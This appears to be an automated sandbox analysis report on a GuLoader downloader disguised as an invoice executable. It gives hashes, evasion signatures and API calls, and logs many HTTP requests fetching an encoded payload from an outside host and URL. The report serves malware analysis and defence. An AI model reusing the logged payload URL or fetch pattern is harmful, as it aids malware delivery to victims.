Windows Analysis Report
INVOICE-98656789.exe

Overview

General Information

Sample Name:	INVOICE-98656789.exe
Analysis ID:	1335267
MD5:	9cecc409f4f9637375b042b196012854
SHA1:	f6c07a9f0d98e34247d91de3c1a5a996e8d98791
SHA256:	bfb89b8cfb7e0bef091052feef1b6334007932f8db57417445d0476ac22eb1f1
Infos:

Detection

GuLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Snort IDS alert for network traffic

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Mass process execution to delay analysis

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses 32bit PE files

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Too many similar processes found

Contains functionality to dynamically determine API calls

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: INVOICE-98656789.exe	Virustotal: Detection: 25%			Perma Link
Source: INVOICE-98656789.exe	ReversingLabs: Detection: 18%

Uses 32bit PE files

Source: INVOICE-98656789.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: INVOICE-98656789.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_00405A0C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A0C
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_004065DD FindFirstFileA,FindClose,	0_2_004065DD
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_004027AF FindFirstFileA,	0_2_004027AF

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:49780 -> 78.135.106.235:80

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://libersis.com
Source: INVOICE-98656789.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: INVOICE-98656789.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://twitter.com
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bin
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bin2(f
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bin3
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bin?
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.binG
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.binc
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.binfF
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bino
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.binows
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bins
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bintG3
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/~
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/api.js
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/

Source: unknown

DNS traffic detected: queries for: www.batimetalelk.com

Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_004054CC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004054CC

Too many similar processes found

Source: powershell.exe	Process created: 152
Source: conhost.exe	Process created: 84

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: INVOICE-98656789.exe

Uses 32bit PE files

Source: INVOICE-98656789.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_00403395 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403395

Detected potential crypto function

